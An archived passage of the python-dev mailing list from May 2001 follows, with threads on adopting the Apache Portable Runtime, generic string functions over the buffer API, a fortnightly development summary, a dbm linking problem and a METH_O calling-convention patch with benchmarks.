It currently supports: Unix (includes BeOS), Win32 and OS/2. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gstein at lyra.org Thu May 24 14:55:55 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 05:55:55 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com> Message-ID: <20010524055555.B5402@lyra.org> On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A.
Lemburg wrote: > "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > > > GS> Toss out a ton of the platform-specific stuff in Python and > > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > > GS> it could also help with loading shared libraries, threading, > > GS> mmap'd files, sockets, etc. > > > > I don't know squat about APR, but would it have to be either-or? IOW, > > would it be possible to wrap the APR in a module (or package) and > > provide it as an importable alternative? Sure, that is a possibility, but it doesn't save Python much in terms of maintenance or portability. "Just another library" Truly using it could certainly be done as a slow migration, and it is definitely possible to only use portions, subsets, etc. Another alternative would be to use APR as a "platform target". But that just adds yet another platform to support rather than simplifying. > Should be possible; the problem is: how do you get the APR types > to interact with the original Python ones (e.g. file types). Many The header is a total misnomer, but "apr_portable.h" provides access to an opaque type's underlying native object (many of us aren't sure how Ryan arrived at "portable" being the name for the least-portable aspect of the library :-). Anyways... you can extract a file descriptor from a file or socket or pipe. Or a thread ID from a thread object. etc. > low-level Python functions require the native Python types, so > while wrapping APR as Python module would provide an alternative, that > alternative will most probably not help much w/r to simplifying > portability issues. Right. I'd say use the APR functions unless absolute speed is required (such as the readlines stuff). But you could also argue that the hard-core platform specific optimizations could go into APR itself, so that Python doesn't have to worry about them.
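Python's own wrapper objects use a comparable convention. A file or socket object returns its native descriptor through fileno(), so native calls and the wrapper can share one handle. The following is a minimal sketch in modern Python 3 using an OS pipe. It only illustrates the idea and is not APR's apr_portable.h API:

```python
import os

# Create a native pipe, then wrap its read end in a Python file object.
read_fd, write_fd = os.pipe()
reader = os.fdopen(read_fd, "rb")

# The wrapper reports the same native descriptor it was built from,
# so low-level os calls and the file object share one underlying pipe.
assert reader.fileno() == read_fd

os.write(write_fd, b"hello")
os.close(write_fd)        # closing the write end lets read() reach EOF

data = reader.read()      # reads everything up to EOF
reader.close()            # also closes read_fd
print(data)
```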
> FYI, here's what the APR has to offer (taken from the APRDesign
> file that comes with Apache 2.0 beta):
> """
> The base types in APR
> file_io     File I/O, including pipes
> lib         A portable library originally used in Apache. This contains
>             memory management, tables, and arrays.
> locks       Mutex and reader/writer locks
> misc        Any APR type which doesn't have any other place to belong
> network_io  Network I/O
> shmem       Shared Memory (Not currently implemented)
> signal      Asynchronous Signals
> threadproc  Threads and Processes
> time        Time
> """
That doc is out of date; the list is missing: shared library handling, i18n, mmap, user information access (e.g. getpwnam), uuid handling, getopt replacements, cryptographic random data, and a few other bits here and there. The shared mem actually is implemented mostly, via the libmm library. And note that some of those topics have some nice depth. As I mentioned, network_io supports IPv6, but also portable name lookups, sendfile(), etc. The file_io stuff supports optimized stat() and opendir-type calls for the platform. > It currently supports: Unix (includes BeOS), Win32 and OS/2. A lot more than that :-) Pretty much all the Unix variants, including OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 15:00:16 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:00:16 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> Message-ID: <20010524060016.D5402@lyra.org> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > Greg Stein wrote: >... > > So... my question is: is there any way that we can retain a generic find() > > (and similar functions from the string/strop module) that operates on any > > type that implements the buffer API?
> > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > implements some standard methods for 8-bit character data (using the buffer > > API), which can be mixed into new Python types" That would reduce the burden > > for new types. > > I suppose that in 2.2 we'll be able to build a class/type > hierarchy which then provides these possibilities. I haven't > followed Guido's latest checkins closely though -- could be that > types don't support multiple inheritance. No idea either... that's why I asked. > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). You're totally missing the point with that suggestion. It does *not* suffice to add them to buffer objects. What about array objects? mmap objects? Random Joe Object who implements the buffer interface? All of those are out of luck. With strop, I can pass any of those objects to strop.find(). That function has a polymorphic argument. In the current arrangement, every object must implement their own .find and .upper and .whatever. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mwh at python.net Thu May 24 15:02:34 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 14:02:34 +0100 (BST) Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <20010524055555.B5402@lyra.org> Message-ID: I can't think of a good way of expressing this, but I don't think we should try to make writing non cross-platform code in Python impossible. Yes, it should be easy to write x-platform code, but if there's some very specific platform trick I can do with, say, setsockopt, I don't want Python to hide it from me just 'cause it doesn't work on VMS. Maybe this isn't an issue here. On Thu, 24 May 2001, Greg Stein wrote: [...] > That doc is out of date; the list is missing: shared library handling, i18n, > mmap, user information access (e.g.
getpwnam), uuid handling, getopt > replacements, cryptographic random data, and a few other bits here and > there. The shared mem actually is implemented mostly, via the libmm library. How big is APR? How stable? (in terms of interface; I'm assuming it doesn't crap out through bad programming or it'd be a non-starter) > And note that some of those topics have some nice depth. As I mentioned, > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > The file_io stuff support optimized stat() and opendir-type calls for the > platform. > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > A lot more than that :-) Pretty much all the Unix variants, including > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, Playstation 2(!), from looking at http://www.python.org/download/download_other.html. Cheers, M. From gstein at lyra.org Thu May 24 15:59:21 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:59:21 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100 References: <20010524055555.B5402@lyra.org> Message-ID: <20010524065921.E5402@lyra.org> On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote: > I can't think of a good way of expressing this, but I don't think we > should try to make writing non cross-platform code in Python impossible. I don't think this would preclude writing non cross-platform code. As I mentioned, there isn't anything that would prevent the stuff from working side by side. The idea is to simplify certain aspects of Python's platform specific stuff. For example: all those variants of dynamically loading shared modules (Python/dynload_*.c) can be tossed along with the config magic. 
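The ctypes module offers a loose modern analogy for collapsing the Python/dynload_*.c variants behind one interface, although it was only added in Python 2.5, long after this thread. ctypes.util.find_library() maps a short name to the platform's file name, and ctypes.CDLL() loads the library with the native loader (dlopen() on POSIX, LoadLibrary() on Windows). The following is a minimal sketch that assumes a POSIX system where the C math library can be found as "m":

```python
import ctypes
import ctypes.util

# Map the short name "m" to a platform-specific file name,
# e.g. "libm.so.6" on Linux; returns None if nothing is found.
libm_path = ctypes.util.find_library("m")

# One call loads the library whatever the platform's native loader is.
# On POSIX, passing None opens the symbols already in the process.
libm = ctypes.CDLL(libm_path)

# Declare the C signature: double cos(double)
libm.cos.argtypes = [ctypes.c_double]
libm.cos.restype = ctypes.c_double

print(libm.cos(0.0))
```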
> Yes, it should be easy to write x-platform code, but if there's some very > specific platform trick I can do with, say, setsockopt, I don't want > Python to hide it from me just 'cause it doesn't work on VMS. APR isn't a least common denominator approach. >... > > That doc is out of date; the list is missing: shared library handling, i18n, > > mmap, user information access (e.g. getpwnam), uuid handling, getopt > > replacements, cryptographic random data, and a few other bits here and > > there. The shared mem actually is implemented mostly, via the libmm library. > > How big is APR? That's relative :-) On my Linux box, a stripped library is 85k. It is also (theoretically) possible to skip building portions of APR. The APIs and symbols are set up for that, but the autoconf setup isn't yet. If you're embedding a private APR build, then you can fine tune what is needed. However, if you're building a public/shared one, then you wouldn't really want to trim it back like that. > How stable? The existing functionality is quite stable. We just keep adding more, though :-) > (in terms of interface; I'm assuming it > doesn't crap out through bad programming or it'd be a non-starter) hehe... you can call it a non-starter, then. APR assumes you pass it valid pointers and objects. For example, if you call apr_file_read(NULL, NULL, 100), then you'll get a segfault rather than EINVAL. Personally, I find that behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't; and this is a programmer error that needs to be attended to -- throw it in his face) Whether others think that is a non-starter... hard to know :-) [ actually, one of the hardest things to integrate would be APR's memory management approach with Python's ] > > And note that some of those topics have some nice depth. As I mentioned, > > network_io supports IPv6, but also portable name lookups, sendfile(), etc. 
> > The file_io stuff supports optimized stat() and opendir-type calls for the > > platform. > > > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > > > A lot more than that :-) Pretty much all the Unix variants, including > > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, > Playstation 2(!), from looking at > http://www.python.org/download/download_other.html. Sure it's smaller. It's a blue sky radical suggestion. No more, no less. :-) I mentioned it because the IPv6 stuff came up. I already know a codebase that has handled all the portability issues. That is a bonus :-) However, for the platforms that APR *does* handle today, that would still be a big code reduction for Python. And in the future? Why not extend APR to those other platforms and reduce the Python code even more. I think shifting Python to a portability library is actually quite an interesting thought experiment. Enough to mention it and get people thinking. I think it could be quite handy for the longer term maintainability. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Thu May 24 16:54:24 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 16:54:24 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <3B0D20A0.3C881F89@lemburg.com> Greg Stein wrote: > > On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > > Greg Stein wrote: > >... > > > So... my question is: is there any way that we can retain a generic find() > > > (and similar functions from the string/strop module) that operates on any > > > type that implements the buffer API? > > > > > > Maybe there is some way we can do a mixin for Python types? e.g.
"this mixin > > > implements some standard methods for 8-bit character data (using the buffer > > > API), which can be mixed into new Python types" That would reduce the burden > > > for new types. > > > > I suppose that in 2.2 we'll be able to build a class/type > > hierarchy which then provides these possibilities. I haven't > > followed Guido's latest checkins closely though -- could be that > > types don't support multiple inheritance. > > No idea either... that's why I asked. > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > You're totally missing the point with that suggestion. It does *not* suffice > to add them to buffer objects. What about array objects? mmap objects? > Random Joe Object who implements the buffer interface? That's the point: you can wrap all those into a buffer object and then use the buffer object methods to manipulate them. In that sense, buffer objects provide an adaptor to the underlying object which implements the needed methods. > All of those are out of luck. > > With strop, I can pass any of those objects to strop.find(). That function > has a polymorphic argument. > > In the current arrangement, every object must implement their own .find and > .upper and .whatever. > > Cheers, > -g > > -- > Greg Stein, http://www.lyra.org/ -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip at pobox.com Thu May 24 17:55:23 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:55:23 -0500 Subject: [Python-Dev] strop vs.
string In-Reply-To: <20010524060016.D5402@lyra.org> References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <15117.12011.323759.496982@beluga.mojam.com> Greg> With strop, I can pass any of those objects to strop.find(). That Greg> function has a polymorphic argument. Where doesn't strop compile/run? If it works everywhere, either just rename it to be the string module (copying any bits from the existing string module that it doesn't yet have) or rename it something like buffer_funcs. Skip From skip at pobox.com Thu May 24 17:58:24 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:58:24 -0500 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: References: <20010524055555.B5402@lyra.org> Message-ID: <15117.12192.114564.111578@beluga.mojam.com> >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. >> >> A lot more than that :-) Pretty much all the Unix variants, including >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, Michael> VMS, Playstation 2(!), Not to mention MacOS < X... ;-) Skip From mwh at python.net Thu May 24 18:38:37 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 17:38:37 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24 Message-ID: This is a summary of traffic on the python-dev mailing list between May 10 and May 24 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. 
This is the eighth summary written by Michael Hudson. Summaries are archived at:

Posting distribution (with apologies to mbm)

Number of articles in summary: 322

    Thu 10  Fri 11  Sat 12  Sun 13  Mon 14  Tue 15  Wed 16
      23      25      17      18      28      31      36

    Thu 17  Fri 18  Sat 19  Sun 20  Mon 21  Tue 22  Wed 23
      32      25       2      15      18      20      32

Pretty busy fortnight. The above distribution may be somewhat skewed because I changed my subscription address to python-dev and was unsubscribed for a while. Although any impact this had is probably countered by ESR and Barry's discussion of "Puffy the Frog"...

* Type/class *

Paul Prescod has been keeping an eye on Guido's descr-branch work, and posted concerns about when objects will have a __dict__:

Then there was more technical discussion about subclassing builtin types and Steven Majewski evangelising prototype-based OO languages (though I'm not sure why!).

* Easy codec access *

Marc-Andre Lemburg checked in his decode string method patch, and some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

There was a small discussion on what other codecs might be handy and Guido added quoted-printable to check it was easy.
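For readers on Python 3, str.encode() and bytes.decode() only handle text encodings, so bytes-to-bytes codecs like the ones above are reached through codecs.encode() and codecs.decode(). The following is a minimal sketch of the same zlib/base64 round trip, plus the quoted-printable codec (registered under the alias "quopri"). It shows the modern spelling, not the 2001 API:

```python
import codecs

data = b"abc"

# Compress, then base64-encode: the Python 3 spelling of
# "abc".encode('zlib').encode('base64').
packed = codecs.encode(codecs.encode(data, "zlib"), "base64")

# Undo the two steps in reverse order.
unpacked = codecs.decode(codecs.decode(packed, "base64"), "zlib")
assert unpacked == data

# Quoted-printable is another bytes-to-bytes codec; 8-bit bytes round-trip.
qp = codecs.encode(b"caf\xe9", "quopri")
assert codecs.decode(qp, "quopri") == b"caf\xe9"
print(packed, qp)
```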
* Performance *

The big discussion(s) on python-dev over the past fourteen days have centred on performance, especially on that of comparisons and the related area of dict performance. It all started with Tim Peters running a simple test program on 2.0, 2.1 and current CVS:

The discussion had an unusual flavour for one about performance: a concentration on measuring performance numbers and making sure that the optimizations being discussed actually improved these numbers. This is hard; everyone wants to speed up the "typical Python app", but of course there is no such thing; people have been using, amongst others, pystone, pybench and the test suite, none of which are particularly good candidates...

Tim posted the distribution of sizes of dicts in a run of the test suite: which showed that small dicts are overwhelmingly the commonest. Marc piped up with an old optimization idea of his:

He posted a patch to sourceforge, Tim rewrote it and checked it in, so dicts should be a little faster in 2.2.

But as I said, the discussion was kicked off by the performance of comparisons, especially strings. Martin von Loewis posted some statistics from an instrumented interpreter:

The issue is that the rich comparisons of Python 2.1 have added a layer of complexity to the comparisons code. Although the rich comparisons (might) provide an opportunity for faster code in some circumstances, code that still uses old-style comparisons can and does take a hit. Strings still use the old-style comparisons and are compared a *lot* (especially in dicts), so it seems "upgrading" them to rich comparisons should be a win, and Marc posted a patch to sf that does this. Marc also managed to promise to make a concerted effort to find speed optimizations in the next few months:

Finally, in a coda Jeremy noticed that Python spends an alarming amount of time decoding those "Oi|s#" strings that get passed to PyArg_ParseTuple: and Tim pointed out that optimizing "O" might be a win:

* FP vs. tutorial *

Tim pointed out that the tutorial currently contains examples of floating point output that is platform dependent, and that this is bad. He proposed changing the tutorial to only use fractions that can be exactly represented as floats, and adding a discussion (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

is not broken.

There was some debate about how detailed that explanation should be. The point was made that it's not really important to explain precisely *why* this happens; it suffices to convince the newbie that floating point is more complicated than he or she thinks. Let's hope that suitable text is composed soon, and that people actually read it... there have been two "floating point is broken" bug reports on sourceforge in just the last week.

* unifying os.rename semantics across platforms *

Skip pointed out that os.rename behaves differently on Posix and Windows platforms when the destination file exists: on Posix the destination is silently replaced in an atomic operation, whereas on Windows an exception is raised. Skip proposed enforcing posix semantics everywhere, but this has two problems: (a) it's backwards incompatible, and (b) it's impossible (you can't avoid the race condition on Windows). So maybe we'll just settle for better documentation.

* Python 2.1.1 *

Thomas Wouters started back-porting bug fixes to the 2.1-maint branch in preparation for a 2.1.1 release. There are as yet no firm (or even vague) plans about release dates.

* Daily Python-URL on your Palm *

Marc-Andre Lemburg announced that you can now read Pythonware's Daily Python-URL on your Palm Pilot as an AvantGo channel:

Cheers,
M.

From gstein at lyra.org Thu May 24 21:45:18 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 12:45:18 -0700 Subject: [Python-Dev] strop vs.
string In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <20010524124518.N5402@lyra.org> On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote: >... > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. That would certainly be a valid solution. And at the C level, we could share functions between PyBufferObject and PyStringObject. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 22:07:43 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 13:07:43 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500 References: <20010524055555.B5402@lyra.org> <15117.12192.114564.111578@beluga.mojam.com> Message-ID: <20010524130743.O5402@lyra.org> On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote: > > >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. > >> > >> A lot more than that :-) Pretty much all the Unix variants, including > >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, > Michael> VMS, Playstation 2(!), > > Not to mention MacOS < X... ;-) As I mentioned, MacOS X is already there. MacOS Classic is not. But the presence of a portability library such as APR does not exclude the use of direct platform hooks where/when necessary. For a bunch of stuff, you use APR [to reduce complexity/maintenance]. For the rest, you go native just like today. 
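Greg's split ("use the portable layer, go native where needed") later appeared inside Python itself. Since Python 3.5, socket.socket.sendfile() uses the high-performance os.sendfile() where it is available and falls back to plain send() otherwise. The following is a minimal sketch using a local socket pair. It illustrates the design idea and is not something APR or 2001-era Python provided:

```python
import socket
import tempfile

payload = b"x" * 4096

with tempfile.TemporaryFile() as f:      # opened in binary mode ("w+b")
    f.write(payload)
    f.seek(0)

    sender, receiver = socket.socketpair()
    with sender, receiver:
        # sendfile() tries the native os.sendfile() fast path first and
        # falls back to a portable send() loop when that is unavailable.
        sent = sender.sendfile(f)
        sender.shutdown(socket.SHUT_WR)

        # Read until the peer signals end-of-stream.
        received = bytearray()
        while True:
            chunk = receiver.recv(65536)
            if not chunk:
                break
            received.extend(chunk)

print(sent, len(received))
```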
Cheers, -g -- Greg Stein, http://www.lyra.org/ From skip at pobox.com Thu May 24 23:15:48 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 16:15:48 -0500 Subject: [Python-Dev] Odd message from test_dbm Message-ID: <15117.31236.804746.160037@beluga.mojam.com> I just noticed this message when running make test: test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip them... Anybody else seen this? Skip From thomas at xs4all.net Thu May 24 23:42:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 23:42:58 +0200 Subject: [Python-Dev] Odd message from test_dbm In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500 References: <15117.31236.804746.160037@beluga.mojam.com> Message-ID: <20010524234258.I690@xs4all.nl> On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote: > I just noticed this message when running make test: > test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey > I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check > libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip > them... The problem is that the dbmmodule isn't linked to the right library. Debian has a similar (if not the same) problem. setup.py doesn't try hard enough to figure out the right library to link with; it checks for libndbm, but not libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.) I *think* all it needs to do is check for libdbm as well as libndbm, but this might pick up old/incompatible libraries on some platforms, and it might still require fiddling of include paths on others. 
I seem to recall you had to include either /usr/include/db1/ndbm.h (to use libdbm) or /usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm 'emulation') but I gave up in frustration trying to figure out the difference :P -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From greg at cosc.canterbury.ac.nz Fri May 25 04:45:01 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 25 May 2001 14:45:01 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com> Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). Aren't buffer objects as they're currently implemented inherently dangerous? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From martin at loewis.home.cs.tu-berlin.de Fri May 25 08:00:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 08:00:47 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> > Special-casing the snot out of "O" looks like a winner : I have a patch on SF that takes this approach: http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 The idea is that functions can be declared as METH_O, instead of METH_VARARGS. I also offer METH_l, but this is currently not used. The approach could be extended to other signatures, e.g. METH_O_opt_O (i.e. "O|O"). Some signatures cannot be changed into special-calls, e.g. "O!", or "ll|l". 
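A rough Python model of the two conventions Martin contrasts may make the saving concrete. It is only an analogy: the flag names mirror the C constants, but their values, `call_builtin()` and the two `append` variants are hypothetical stand-ins, not CPython's implementation. Under METH_VARARGS the callee receives the whole argument tuple and must unpack it itself (in C, through PyArg_ParseTuple); under METH_O the dispatcher checks the count once and hands over the single object directly.

```python
# Hypothetical stand-ins for the C flags; the values are arbitrary.
METH_VARARGS = "METH_VARARGS"
METH_O = "METH_O"


def call_builtin(func, flags, self, args):
    """Dispatch a call according to its declared convention (a model only)."""
    if flags == METH_O:
        # Fast path: check the argument count once, then pass the object
        # itself, so the callee needs no tuple-parsing step.
        if len(args) != 1:
            raise TypeError(
                f"{func.__name__}() takes exactly one argument ({len(args)} given)")
        return func(self, args[0])
    if flags == METH_VARARGS:
        # General path: the callee receives the tuple and parses it itself.
        return func(self, args)
    raise ValueError(f"unsupported calling convention: {flags!r}")


def append_varargs(self, args):
    # Plays the role of PyArg_ParseTuple(args, "O:append", &item) in C.
    if len(args) != 1:
        raise TypeError("append() takes exactly one argument")
    (item,) = args
    self.append(item)


def append_o(self, item):
    # Under METH_O the single argument arrives ready to use.
    self.append(item)
```

Calling `call_builtin(append_varargs, METH_VARARGS, lst, (1,))` and `call_builtin(append_o, METH_O, lst, (2,))` on an empty list leaves it as `[1, 2]`; the only difference is where the argument checking happens.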
In the PyXML test suite, "O" is indeed the most frequent case (72%), and it is primarily triggered through len (26%), append (24%), and ord (6%). These are the only functions that make use of the new calling conventions at the moment. If you look at the patch, you'll see that it is quite easy to change a method to use a different calling convention (basically just remove the PyArg_ParseTuple call). To measure the patch, I use the script

    from time import clock

    indices = [1] * 20000
    indices1 = indices*100
    r1 = [1]*60

    def doit(case):
        s = clock()
        i = 0
        if case == 0:
            f = ord
            for i in indices1:
                f("o")
        elif case == 1:
            for i in indices:
                l = []
                f = l.append
                for i in r1:
                    f(i)
        elif case == 2:
            f = len
            for i in indices1:
                f("o")
        f = clock()
        return f - s

    for i in xrange(10):
        print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

    2.190 1.800 2.240
    2.200 1.800 2.220
    2.200 1.800 2.230
    2.220 1.800 2.220
    2.200 1.800 2.220
    2.200 1.790 2.240
    2.200 1.790 2.230
    2.200 1.800 2.220
    2.200 1.800 2.240
    2.200 1.790 2.230

With the patch, I get

    1.440 1.330 1.460
    1.420 1.350 1.440
    1.430 1.340 1.430
    1.510 1.350 1.460
    1.440 1.360 1.470
    1.460 1.330 1.450
    1.430 1.330 1.420
    1.440 1.340 1.440
    1.430 1.340 1.430
    1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the function has to do. Please let me know what you think. Regards, Martin From mal at lemburg.com Fri May 25 10:23:10 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:23:10 +0200 Subject: [Python-Dev] strop vs. string References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> Message-ID: <3B0E166E.581816AA@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > Aren't buffer objects as they're currently implemented > inherently dangerous? Why should they be ?
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 10:56:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:56:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <3B0E1E2C.4BC121B5@lemburg.com> "Martin v. Loewis" wrote: > > > Special-casing the snot out of "O" looks like a winner : > > I have a patch on SF that takes this approach: > > http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 > > The idea is that functions can be declared as METH_O, instead of > METH_VARARGS. I also offer METH_l, but this is currently not used. The > approach could be extended to other signatures, e.g. METH_O_opt_O > (i.e. "O|O"). Some signatures cannot be changed into special-calls, > e.g. "O!", or "ll|l". > > [benchmark] > So the speed-up is roughly 30% to 50%, depending on how much work the > function has to do. > > Please let me know what you think. Great idea, Martin. One suggestion though: I would change the way the function is "declared" in the method list. You currently use: {"append", (PyCFunction)listappend, METH_O, append_doc}, Now this would be more flexible if you would implement a scheme which lets us put the parser string into the method list. The call mechanism could then easily figure out how to call the method and it would also be more easily extensible: {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, This would then (just like in your patch) call the listappend function with the parser arguments inlined into the C call: listappend(self, arg0) A parser marker "OO" would then call a method like this: method(self, arg0, arg1) and so on.
This approach costs a little more (the string compare), but should provide a more direct way of converting existing functions to the new convention (just copy&paste the PyArg_ParseTuple() argument) and also allows implementing a generic scheme which then again relies on PyArg_ParseTuple() to do the argument parsing, e.g. "is#" could be implemented as: PyObject *method(PyObject *self, int arg0, char *arg1, int *arg1_len) For optional arguments we'd need some convention which then lets the called function add the default value as needed. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From ping at lfw.org Fri May 25 12:56:33 2001 From: ping at lfw.org (Ka-Ping Yee) Date: Fri, 25 May 2001 05:56:33 -0500 (CDT) Subject: [Python-Dev] May 25 is Towel Day (towelday.org) Message-ID: If you have enjoyed Douglas Adams' works, please consider carrying or wearing a towel with you everywhere today, May 25, as a tribute and in his memory. For more about Towel Day, visit http://www.towelday.org/. My apologies for being off-topic. -- ?!ng From gstein at lyra.org Fri May 25 13:59:23 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 04:59:23 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 